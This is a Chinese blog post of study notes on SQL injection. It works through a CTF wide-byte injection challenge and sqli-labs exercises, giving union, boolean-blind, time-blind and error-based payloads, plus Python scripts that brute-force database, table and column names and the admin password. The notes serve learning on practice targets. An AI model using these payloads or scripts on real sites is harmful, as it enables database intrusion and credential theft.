<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入," />





  <link rel="alternate" href="/atom.xml" title="Mugen" type="application/atom+xml" />






<meta name="description" content="由题引入南邮CTF sql injection 3 这是一道宽字节注入 分析一下 1234验证字段数http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; order by 1,2 %23  （正常）http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; orde">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入学习">
<meta property="og:url" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/index.html">
<meta property="og:site_name" content="Mugen">
<meta property="og:description" content="由题引入南邮CTF sql injection 3 这是一道宽字节注入 分析一下 1234验证字段数http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; order by 1,2 %23  （正常）http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; orde">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/1.jpg">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/4.png">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/8.png">
<meta property="og:image" content="https://gitee.com/legoc/legoimage/raw/master/img/5.jpg">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/7.jpg">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/9.png">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/2.jpg">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/3.png">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/10.jpg">
<meta property="og:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/11.jpg">
<meta property="og:updated_time" content="2021-01-18T10:53:27.021Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入学习">
<meta name="twitter:description" content="由题引入南邮CTF sql injection 3 这是一道宽字节注入 分析一下 1234验证字段数http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; order by 1,2 %23  （正常）http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&amp;apos; orde">
<meta name="twitter:image" content="http://legoc.gitee.io/2018/09/17/SQL注入学习/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://legoc.gitee.io/2018/09/17/SQL注入学习/"/>





  <title>SQL注入学习 | Mugen</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mugen</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lego's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />
            
            朋友
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://legoc.gitee.io/2018/09/17/SQL注入学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lego">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mugen">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-17T12:02:00+08:00">
                2018-09-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读次数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="由题引入"><a href="#由题引入" class="headerlink" title="由题引入"></a>由题引入</h3><p>南邮CTF <a href="http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1" target="_blank" rel="noopener">sql injection 3</a></p>
<p>这是一道宽字节注入</p>
<p>分析一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">验证字段数</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&apos; order by 1,2 %23  （正常）</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df&apos; order by 1,2，3 %23 （报错）</span><br><span class="line">可知字段数为2</span><br></pre></td></tr></table></figure>
<p>然后就可以构造payload了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,2 %23</span><br><span class="line">回显2</span><br><span class="line">首先为什么要id=-1呢？这里是因为他只回显一行id=-1时就可以只回显select后面的了</span><br></pre></td></tr></table></figure>
<p><img src="/2018/09/17/SQL注入学习/1.jpg" alt="">解题过程</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">爆表</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23</span><br><span class="line"></span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(table_name) from information_schema.tables where table_name=&apos;ctf&apos; %23（会报错）</span><br><span class="line">转换成16进制</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(table_name) from information_schema.tables where table_name=0x637466 %23</span><br><span class="line"></span><br><span class="line">爆列</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(column_name) from information_schema.columns where table_name=0x637466 %23</span><br><span class="line"></span><br><span class="line">爆字段</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(user,0x3a,pw) from ctf %23</span><br><span class="line"></span><br><span class="line">结果</span><br><span class="line">your sql:select id,title from news where id = &apos;-1運&apos; union select 1,group_concat(user,0x3a,pw) from ctf %23</span><br><span class="line">admin:21dd715a3605b2a4053e80387116c190</span><br><span class="line">查CMD5的值为njupt</span><br><span class="line"></span><br><span class="line">但是flag不在这个表里面，flag在ctf4里面</span><br><span class="line">http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df&apos; union select 1,group_concat(id,0x3a,flag) from ctf4 %23</span><br><span class="line">your sql:select id,title from news where id = &apos;-1運&apos; union select 1,group_concat(id,0x3a,flag) from ctf4 #&apos;</span><br><span class="line">1:nctf&#123;gbk_3sqli&#125;</span><br></pre></td></tr></table></figure>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>小结一下这里的各种东西</p>
<h4 id="表结构"><a href="#表结构" class="headerlink" title="表结构"></a>表结构</h4><p>information_schema表结构</p>
<p><img src="/2018/09/17/SQL注入学习/4.png" alt=""></p>
<p>其中我们要重点注意schemata 表、表tables和表columns</p>
<p>schemata 表</p>
<p><img src="/2018/09/17/SQL注入学习/8.png" alt=""></p>
<p>表tables</p>
<p><img src="https://gitee.com/legoc/legoimage/raw/master/img/5.jpg" alt=""></p>
<p>所以我们where限定条件来查</p>
<p>查询table_name列可以查出我们需要的表</p>
<p>table_schema列是关于存放在数据库的信息</p>
<p><img src="/2018/09/17/SQL注入学习/7.jpg" alt=""></p>
<p>表columns</p>
<p><img src="/2018/09/17/SQL注入学习/9.png" alt=""></p>
<h4 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h4><p>group_concat</p>
<p>函数语法：</p>
<p>group_concat( [DISTINCT]  要连接的字段   Order BY 排序字段 ASC/DESC )</p>
<p>在sql注入中为了回显出非单独数据</p>
<p>这样就可以把我们所需的数据集中在某列</p>
<p><img src="/2018/09/17/SQL注入学习/2.jpg" alt=""></p>
<p>可中间插入某符号进行区分</p>
<p>0x7c即为|的hex编码</p>
<p><img src="/2018/09/17/SQL注入学习/3.png" alt=""></p>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><h4 id="基于bool型的盲注"><a href="#基于bool型的盲注" class="headerlink" title="基于bool型的盲注"></a>基于bool型的盲注</h4><p> 例子来源sqli-labs Less-8</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.20.134/sql/Less-8/?id=1&apos;order by 1,2,3 --+ 有回显</span><br><span class="line">http://192.168.20.134/sql/Less-8/?id=1&apos;order by 1,2,3,4 --+ 无回显</span><br><span class="line">http://192.168.20.134/sql/Less-8/?id=1&apos; and 1 --+ 有回显 后面我们可以通过这个1来进行盲注</span><br></pre></td></tr></table></figure>
<p>爆出当前数据库名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.20.134/sql/Less-8/?id=1&apos; and length(database())=8 --+ 可知当前数据库长度为8</span><br><span class="line">http://192.168.20.134/sql/Less-8/?id=1&apos; and ascii(substr(database(),1,1))=115 --+  可知数据库第一个字母的asscii码为115即为s</span><br></pre></td></tr></table></figure>
<p>盲注数据库名脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">db=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">9</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i)</span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr(database(),%s,1))=%s --+"</span> %(ks,s)</span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line">        order_num=re.findall(<span class="string">r"You are in"</span>,r.text)</span><br><span class="line">        <span class="keyword">if</span>(len(order_num)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>盲注表名脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">db=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">40</span>): <span class="comment">#这里可以设置大一点，跑完关闭</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i)</span><br><span class="line">        <span class="comment">#url="http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr(database(),%s,1))=%s --+" %(ks,s)</span></span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from "</span>\</span><br><span class="line">        <span class="string">"information_schema.tables where table_schema=database()),%s,1))=%s --+"</span> %(ks,s)</span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line">        order_num=re.findall(<span class="string">r"You are in"</span>,r.text)</span><br><span class="line">        <span class="keyword">if</span>(len(order_num)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>盲注列名脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">db=<span class="string">""</span> </span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">100</span>): <span class="comment">#这里可以设置大一点，跑完关闭</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i) </span><br><span class="line">        <span class="comment">#url="http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr(database(),%s,1))=%s --+" %(ks,s)</span></span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from "</span>\</span><br><span class="line">        <span class="string">"information_schema.columns where table_name=0x7573657273),%s,1))=%s --+"</span> %(ks,s)</span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line">        order_num=re.findall(<span class="string">r"You are in"</span>,r.text)</span><br><span class="line">        <span class="keyword">if</span>(len(order_num)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>盲注admin密码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">db=<span class="string">""</span> </span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">100</span>): <span class="comment">#这里可以设置大一点，跑完关闭</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i) </span><br><span class="line">        <span class="comment">#url="http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr(database(),%s,1))=%s --+" %(ks,s)</span></span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-8/?id=1' and ascii(substr((select group_concat(username,0x7c,password) "</span>\</span><br><span class="line">        <span class="string">"from users where username='admin'),%s,1))=%s --+"</span> %(ks,s)   <span class="comment">#去掉where的条件可以爆出其他账号密码</span></span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line">        order_num=re.findall(<span class="string">r"You are in"</span>,r.text)</span><br><span class="line">        <span class="keyword">if</span>(len(order_num)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<h4 id="一些知识点"><a href="#一些知识点" class="headerlink" title="一些知识点"></a>一些知识点</h4><p>ascii码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">32-126 对应为 !-~     这些为可见字符表</span><br></pre></td></tr></table></figure>
<p>length()函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select length(database());    显示8</span><br></pre></td></tr></table></figure>
<p>substr()函数</p>
<p>第一个1表示从第几个开始</p>
<p>第二个1表示一共几个</p>
<p><img src="/2018/09/17/SQL注入学习/10.jpg" alt=""></p>
<p>判断ascii值   s的ascii码为115</p>
<p><img src="/2018/09/17/SQL注入学习/11.jpg" alt=""></p>
<h4 id="基于时间型盲注"><a href="#基于时间型盲注" class="headerlink" title="基于时间型盲注"></a>基于时间型盲注</h4><p> 例子来源sqli-labs Less-9</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.20.134/sql/Less-9/?id=1&apos; and if(1,sleep(3),null) --+             出现延时，存在盲注</span><br><span class="line">http://192.168.20.134/sql/Less-9/?id=1&apos; and if(ascii(substr(database(),1,1))=115,sleep(3),null) --+    说明数据库名第一个数字为s</span><br></pre></td></tr></table></figure>
<p>盲注数据库名脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">db=<span class="string">""</span> </span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">10</span>): <span class="comment">#这里可以设置大一点，跑完关闭</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i) </span><br><span class="line">        start=time.time()</span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-9/?id=1' and if(ascii(substr(database(),%s,1))=%s,sleep(1),null) --+"</span> %(ks,s)</span><br><span class="line">        <span class="comment"># url="http://192.168.20.134/sql/Less-9/?id=1' and ascii(substr((select group_concat(username,0x7c,password) "\</span></span><br><span class="line">        <span class="comment"># "from users where username='admin'),%s,1))=%s --+" %(ks,s)</span></span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>((time.time()-start&gt;<span class="number">1</span>)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>盲注admin密码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">db=<span class="string">""</span> </span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">20</span>): <span class="comment">#这里可以设置大一点，跑完关闭</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        ks=str(k)</span><br><span class="line">        s=str(i) </span><br><span class="line">        start=time.time()</span><br><span class="line">        <span class="comment"># url="http://192.168.20.134/sql/Less-9/?id=1' and if(ascii(substr(database(),%s,1))=%s,sleep(1),null) --+" %(ks,s)</span></span><br><span class="line">        <span class="comment"># url="http://192.168.20.134/sql/Less-9/?id=1' and ascii(substr((select group_concat(username,0x7c,password) "\</span></span><br><span class="line">        <span class="comment"># "from users where username='admin'),%s,1))=%s --+" %(ks,s)</span></span><br><span class="line">        url=<span class="string">"http://192.168.20.134/sql/Less-9/?id=1' and if(ascii(substr((select group_concat(username,0x7c,password) "</span>\</span><br><span class="line">        <span class="string">"from users where username=0x61646d696e),%s,1))=%s,sleep(1),null) --+"</span>%(ks,s)</span><br><span class="line">        r=requests.get(url=url)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>((time.time()-start&gt;<span class="number">1</span>)):</span><br><span class="line">            db=db+chr(i)</span><br><span class="line">            <span class="keyword">print</span> db</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>知识点</p>
<p>mysql中的 if 函数</p>
<p>做表达试用时</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(表达式，结果1，结果2)</span><br><span class="line">如果表达式为true返回结果1，false返回结果2</span><br></pre></td></tr></table></figure>
<p>python中的time模块</p>
<p>函数 time()   获取当前时间戳，即计算机内部时间值，浮点数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; time.time();</span><br><span class="line">1537405183.661</span><br></pre></td></tr></table></figure>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>最近发现了有在线的sqli-labs靶场 来自 <a href="https://bbs.pediy.com/thread-218653.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-218653.htm</a></p>
<h4 id="floor"><a href="#floor" class="headerlink" title="floor()"></a>floor()</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.247.91.228:84/Less-5/?id=1&apos; and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)--+</span><br></pre></td></tr></table></figure>
<h4 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue"></a>extractvalue</h4><p>extractvalue()接受两个字符串参数，一个xml标记xml_frag的片段和一个xpath表达式xpath_expr(也称为定位符)。这个函数返回第一个文本节点的文本。我们可以在xpath中填写获得我们想要的信息的语句。 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.247.91.228:84/Less-5/?id=1&apos; and 1=extractvalue(1,concat(0x7c,(select database()))) --+</span><br></pre></td></tr></table></figure>
<h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><p>updatexml(xml_target,xpath_expr,new_xml)<br>此函数用新的xml片段new_xml替换xml标记xml_target的给定片段的单个部分，然后返回更改的xml。被替换的xml_target的部分与用户提供的xpath表达式xpath_expr匹配。在 mysql 5.6.6及更早版本中，xpath表达式最多可以包含127个字符。这个限制在mysql 5.6.7中解除。如果没有找到匹配xpath_expr的表达式，或者找到多个匹配项，函数将返回原始的xml_target片段。 所有三个参数应该是字符串。我们可以在xpath中填写获得我们想要的信息的语句。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.247.91.228:84/Less-5/?id=1&apos; and 1=updatexml(1,concat(0x7c,(select database())),3)--+</span><br></pre></td></tr></table></figure>
<h4 id="name-const"><a href="#name-const" class="headerlink" title="name_const"></a>name_const</h4><p>name_const(name,value)<br>用于生成结果时，name_const()会使列具有给定的名称。参数应该是常量。它和select value as name是等价的。我们可以构造两个列使得它们名字一样并在列名中填写获得我们想要的信息的语句。</p>
